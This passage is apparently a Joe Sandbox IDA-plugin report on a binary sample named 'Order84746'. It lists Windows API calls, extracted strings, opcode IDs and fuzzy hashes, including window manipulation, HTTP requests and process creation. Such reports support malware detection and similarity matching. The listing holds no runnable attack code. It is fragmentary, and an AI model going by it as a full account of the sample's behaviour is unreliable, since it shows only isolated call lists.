                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009382C2
                          • WSACleanup.WS2_32 ref: 009382C8
                          Strings
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 7d008bccb7308d8de5849f5b8a42d26b27681bbfd3264df483b9f5e9e8880fa2
                          • Instruction ID: 6523da835cd5e6194a3109e5610cf9c3ca7ef9ca6d0f08ba9a925409f036c28a
                          • Opcode Fuzzy Hash: 7d008bccb7308d8de5849f5b8a42d26b27681bbfd3264df483b9f5e9e8880fa2
                          • Instruction Fuzzy Hash: 28517B71608700AFDB209F65CC45B2BBBE9FB49350F048829FA65DB2A1DB74E905DF42
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0092E396
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0092E40C
                          • GetLastError.KERNEL32 ref: 0092E416
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0092E483
                          Strings
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 50d4afaf4b199ff25c68bb8aaae7e19fe01b57b232bfe4fb8dd5d046a0151926
                          • Instruction ID: 4e93ef510e8b51e0bc589f9a589ae7439d4312fc7c3873027f71a4df1ef1e6c2
                          • Opcode Fuzzy Hash: 50d4afaf4b199ff25c68bb8aaae7e19fe01b57b232bfe4fb8dd5d046a0151926
                          • Instruction Fuzzy Hash: E831A435A002199FDB01EF68EC85EBEB7B8FF59304F148415E915EB2A5DB70AA02C751
                          APIs
                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0091B98C
                          • GetDlgCtrlID.USER32 ref: 0091B997
                          • GetParent.USER32 ref: 0091B9B3
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0091B9B6
                          • GetDlgCtrlID.USER32(?), ref: 0091B9BF
                          • GetParent.USER32(?), ref: 0091B9DB
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0091B9DE
                          Strings
                          Similarity
                          • API ID: MessageSend$CtrlParent
                          • String ID: ComboBox$ListBox
                          • API String ID: 1383977212-1403004172
                          • Opcode ID: 9784a8223fc66c175a669ec0dc74de2d668dcaffc6da2a09bba82867831cab04
                          • Instruction ID: 7f436904d9d5b249ae69a405d5555254d1d83cbec74afc8b8cbd27e6608cfdc3
                          • Opcode Fuzzy Hash: 9784a8223fc66c175a669ec0dc74de2d668dcaffc6da2a09bba82867831cab04
                          • Instruction Fuzzy Hash: AD21C475E00108BFCF04ABA5CC85EFEB779EB46314B100119F561972E1DBB958569B20
                          APIs
                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0091BA73
                          • GetDlgCtrlID.USER32 ref: 0091BA7E
                          • GetParent.USER32 ref: 0091BA9A
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0091BA9D
                          • GetDlgCtrlID.USER32(?), ref: 0091BAA6
                          • GetParent.USER32(?), ref: 0091BAC2
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0091BAC5
                          Strings
                          Similarity
                          • API ID: MessageSend$CtrlParent
                          • String ID: ComboBox$ListBox
                          • API String ID: 1383977212-1403004172
                          • Opcode ID: 3a60be1e6436aa9e2b2043efa092f85f7c2c2d513c15a4747f28221a10d69db3
                          • Instruction ID: b292880de5f545fcaf9c2a600687fb080e54c3a1a55a503357e9acb71db93e6a
                          • Opcode Fuzzy Hash: 3a60be1e6436aa9e2b2043efa092f85f7c2c2d513c15a4747f28221a10d69db3
                          • Instruction Fuzzy Hash: 1921B375F01148BFDF00AB65CC85EFEB7BAEF45300F100019F561931A1DBB95956AB21
                          APIs
                          • GetParent.USER32 ref: 0091BAE3
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 0091BAF8
                          • _wcscmp.LIBCMT ref: 0091BB0A
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0091BB85
                          Strings
                          Similarity
                          • API ID: ClassMessageNameParentSend_wcscmp
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1704125052-3381328864
                          • Opcode ID: 5e84f1a61093a74b6fe2504e817a9cbbdc088a4befe30f5e3904715a6e321bef
                          • Instruction ID: ad31a84e9837dcb77be5691e3e6cfc0bd7ffe6dc6c08723032069b6ef90c8b85
                          • Opcode Fuzzy Hash: 5e84f1a61093a74b6fe2504e817a9cbbdc088a4befe30f5e3904715a6e321bef
                          • Instruction Fuzzy Hash: 1E1136B778C30BFEFA207724DC06EE6379E9B91324F200026FA04E44E5EBA5A8906514
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0093B2D5
                          • CoInitialize.OLE32(00000000), ref: 0093B302
                          • CoUninitialize.COMBASE ref: 0093B30C
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0093B40C
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 0093B539
                          • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0093B56D
                          • CoGetObject.OLE32(?,00000000,0096D91C,?), ref: 0093B590
                          • SetErrorMode.KERNEL32(00000000), ref: 0093B5A3
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0093B623
                          • VariantClear.OLEAUT32(0096D91C), ref: 0093B633
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                          • String ID:
                          • API String ID: 2395222682-0
                          • Opcode ID: b87aa832a941622b91814457869ff94e7287a1a3a17698882ec6be6fb68b2c72
                          • Instruction ID: 0bd55af26d5074dc99fc022912492fd9c4f282c3dc7340a1199780ba1df5da83
                          • Opcode Fuzzy Hash: b87aa832a941622b91814457869ff94e7287a1a3a17698882ec6be6fb68b2c72
                          • Instruction Fuzzy Hash: E8C11271608305AFC700DF69C885A6AB7E9FF89308F04491DF69ADB261DB71ED05CB52
                          APIs
                          • __lock.LIBCMT ref: 0090ACC1
                            • Part of subcall function 00907CF4: __mtinitlocknum.LIBCMT ref: 00907D06
                            • Part of subcall function 00907CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00907D1F
                          • __calloc_crt.LIBCMT ref: 0090ACD2
                            • Part of subcall function 00906986: __calloc_impl.LIBCMT ref: 00906995
                            • Part of subcall function 00906986: Sleep.KERNEL32(00000000,000003BC,008FF507,?,0000000E), ref: 009069AC
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0090ACED
                          • GetStartupInfoW.KERNEL32(?,00996E28,00000064,00905E91,00996C70,00000014), ref: 0090AD46
                          • __calloc_crt.LIBCMT ref: 0090AD91
                          • GetFileType.KERNEL32(00000001), ref: 0090ADD8
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0090AE11
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 1426640281-0
                          • Opcode ID: 730f19e3d2dc023e900a943095a0afb5303ff8d56aae1362ab741b8c32626516
                          • Instruction ID: 30826d4b97ff68e846887989eee849d24ff7ec48b66c014b476cce69aa137895
                          • Opcode Fuzzy Hash: 730f19e3d2dc023e900a943095a0afb5303ff8d56aae1362ab741b8c32626516
                          • Instruction Fuzzy Hash: C081E3719153468FDB14CF68C8806AEBBF4AF8A324B24465DD4A6AB3D1C7349803DBD6
                          APIs
                          • __swprintf.LIBCMT ref: 009267FD
                          • __swprintf.LIBCMT ref: 0092680A
                            • Part of subcall function 0090172B: __woutput_l.LIBCMT ref: 00901784
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00926834
                          • LoadResource.KERNEL32(?,00000000), ref: 00926840
                          • LockResource.KERNEL32(00000000), ref: 0092684D
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 0092686D
                          • LoadResource.KERNEL32(?,00000000), ref: 0092687F
                          • SizeofResource.KERNEL32(?,00000000), ref: 0092688E
                          • LockResource.KERNEL32(?), ref: 0092689A
                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009268F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                          • String ID:
                          • API String ID: 1433390588-0
                          • Opcode ID: d9d5cbc75810454d1548b87d98b9584fb85e1b7606704cdfbe58597c93c27290
                          • Instruction ID: 32071598b0d74f911e5304f7dabbae6553a1a798fe7f0b49c4595648292e001c
                          • Opcode Fuzzy Hash: d9d5cbc75810454d1548b87d98b9584fb85e1b7606704cdfbe58597c93c27290
                          • Instruction Fuzzy Hash: C0319EB1A0522AAFDB109F60ED55ABF7BACFF09340F008429F922D2150E774D951EBA0
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00924047
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009230A5,?,00000001), ref: 0092405B
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00924062
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009230A5,?,00000001), ref: 00924071
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00924083
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009230A5,?,00000001), ref: 0092409C
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009230A5,?,00000001), ref: 009240AE
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009230A5,?,00000001), ref: 009240F3
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009230A5,?,00000001), ref: 00924108
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009230A5,?,00000001), ref: 00924113
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 98700afa360589b0dc03be34d0e147c0c39f4c9fdfed42a84ad6861d8e4bfa2b
                          • Instruction ID: 3bf46c73f5b0911fe6b653e97b6c96f163673b7dc5ff2669ac8515113c693ced
                          • Opcode Fuzzy Hash: 98700afa360589b0dc03be34d0e147c0c39f4c9fdfed42a84ad6861d8e4bfa2b
                          • Instruction Fuzzy Hash: 66319171A19224BFDB10DF54EC85B7977BDAF65321F10C019FD05E6294CBB49D809BA0
                          APIs
                          • EnumChildWindows.USER32(?,0091CF50), ref: 0091CE90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ChildEnumWindows
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 3555792229-1603158881
                          • Opcode ID: c342e595fc13799a594f23fdd074b0000642c760f65c9cb18092cf3218a4d68b
                          • Instruction ID: 9853d8a1c2a06c58880aafabf2b0a5b234c28413c25948efa83395a869729430
                          • Opcode Fuzzy Hash: c342e595fc13799a594f23fdd074b0000642c760f65c9cb18092cf3218a4d68b
                          • Instruction Fuzzy Hash: A6919170B4060AAACB18DF64C481BEAFBB9FF05340F508529E559E7191DF306D9ACBE0
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008E30DC
                          • CoUninitialize.COMBASE ref: 008E3181
                          • UnregisterHotKey.USER32(?), ref: 008E32A9
                          • DestroyWindow.USER32(?), ref: 00955079
                          • FreeLibrary.KERNEL32(?), ref: 009550F8
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00955125
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          • Opcode ID: f5ec9e3ed740a007ebce75b618cfe2d61ef8ef8e662e9ec1e495e2a69fb7903b
                          • Instruction ID: e6611bf2cad3c93ba0809da2622681ba2af035e77a79dc46b0dbd53aea68ac63
                          • Opcode Fuzzy Hash: f5ec9e3ed740a007ebce75b618cfe2d61ef8ef8e662e9ec1e495e2a69fb7903b
                          • Instruction Fuzzy Hash: 1C915030700586CFC715EF2AC899B68F3A4FF16305F5541ADE50AA7262DB30AE1ACF55
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 008FCC15
                            • Part of subcall function 008FCCCD: GetClientRect.USER32(?,?), ref: 008FCCF6
                            • Part of subcall function 008FCCCD: GetWindowRect.USER32(?,?), ref: 008FCD37
                            • Part of subcall function 008FCCCD: ScreenToClient.USER32(?,?), ref: 008FCD5F
                          • GetDC.USER32 ref: 0095D137
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0095D14A
                          • SelectObject.GDI32(00000000,00000000), ref: 0095D158
                          • SelectObject.GDI32(00000000,00000000), ref: 0095D16D
                          • ReleaseDC.USER32(?,00000000), ref: 0095D175
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0095D200
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: 3a7865058c63863771cdb61ffc005ca028334e710cbdccea9cb4be53645d48d3
                          • Instruction ID: 698e4d3490784ab65473f8591e94ae7bec24d442b2c2ec35f80bd3aee3adf23b
                          • Opcode Fuzzy Hash: 3a7865058c63863771cdb61ffc005ca028334e710cbdccea9cb4be53645d48d3
                          • Instruction Fuzzy Hash: 65711030505209DFCF35DF65C880ABA7BB9FF49326F144229EE659A2A6C7308845DFA0
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00949B19
                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00949B2D
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00949B47
                          • _wcscat.LIBCMT ref: 00949BA2
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00949BB9
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00949BE7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat
                          • String ID: -----$SysListView32
                          • API String ID: 307300125-3975388722
                          • Opcode ID: 27b25c90fafcb862c64a98b9d14d895a5b0cfb61a32d1b0f3315621da7336414
                          • Instruction ID: 41177294d52b70bb2691db708307c02ca87ac228af4e138e6718a6b5df940cad
                          • Opcode Fuzzy Hash: 27b25c90fafcb862c64a98b9d14d895a5b0cfb61a32d1b0f3315621da7336414
                          • Instruction Fuzzy Hash: 50418F71A40308AFEB219FA4DC85FEB77A8EF48354F10442AF589E7291D6B19D84CB60
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009345FF
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0093462B
                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0093466D
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00934682
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0093468F
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009346BF
                          • InternetCloseHandle.WININET(00000000), ref: 00934706
                            • Part of subcall function 00935052: GetLastError.KERNEL32(?,?,009343CC,00000000,00000000,00000001), ref: 00935067
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                          • String ID:
                          • API String ID: 1241431887-3916222277
                          • Opcode ID: 54c564a3adac1d7dce54a5d87a02cd5820a0da70fba0bbe847d550b75fe539fb
                          • Instruction ID: 8345051b8993cc74963099be403b275a6a9df26ab0d54188322e754dd2907b4e
                          • Opcode Fuzzy Hash: 54c564a3adac1d7dce54a5d87a02cd5820a0da70fba0bbe847d550b75fe539fb
                          • Instruction Fuzzy Hash: 824180B1A05605BFEB159F50CC86FBB77ACFF09308F01402AFA159A141D7B4AD449FA5
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0097DC00), ref: 0093B715
                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0097DC00), ref: 0093B749
                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0093B8C1
                          • SysFreeString.OLEAUT32(?), ref: 0093B8EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                          • String ID:
                          • API String ID: 560350794-0
                          • Opcode ID: 95b321a317bb2ed6b5ce9cbcba668da398c21475d8905b0f5c4e2c5bf615b40e
                          • Instruction ID: 72dfab9343a7c29ee5fdb1657e9661fe8d5a0aa690fa7e10d531a0dbaab34bbe
                          • Opcode Fuzzy Hash: 95b321a317bb2ed6b5ce9cbcba668da398c21475d8905b0f5c4e2c5bf615b40e
                          • Instruction Fuzzy Hash: 7FF10875A00209EFCB04DF94C888EAEB7B9FF89315F108459FA15AB250DB71AE45CF90
                          APIs
                          • _memset.LIBCMT ref: 009424F5
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00942688
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009426AC
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009426EC
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0094270E
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0094286F
                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009428A1
                          • CloseHandle.KERNEL32(?), ref: 009428D0
                          • CloseHandle.KERNEL32(?), ref: 00942947
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                          • String ID:
                          • API String ID: 4090791747-0
                          • Opcode ID: 6e29de12529e8e5f3f6d98698aea1a7b43ce11d2c7ebac428dd8310f02542de4
                          • Instruction ID: ccfdfe6e73715163680ea09fa3e10150dcf1814c0d0ffdcc4bda03530cb2979e
                          • Opcode Fuzzy Hash: 6e29de12529e8e5f3f6d98698aea1a7b43ce11d2c7ebac428dd8310f02542de4
                          • Instruction Fuzzy Hash: 84D19A316042409FCB14EF29C891B6EBBE5FF85314F18885DF9999B2A2DB31EC44CB52
                          APIs
                            • Part of subcall function 008FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008FB759,?,00000000,?,?,?,?,008FB72B,00000000,?), ref: 008FBA58
                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008FB72B), ref: 008FB7F6
                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,008FB72B,00000000,?,?,008FB2EF,?,?), ref: 008FB88D
                          • DestroyAcceleratorTable.USER32(00000000), ref: 0095D8A6
                          • DeleteObject.GDI32(00000000), ref: 0095D91C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          • API String ID: 2402799130-0
                          • Opcode ID: a214572b062b181cd624e904dfd78063489b5e59ec8d1bbf94adab88da39fad7
                          • Instruction ID: ad5574bd307526d638e2df830c7cd7ef1e2f4d54ba663772b8482d9e277eb262
                          • Opcode Fuzzy Hash: a214572b062b181cd624e904dfd78063489b5e59ec8d1bbf94adab88da39fad7
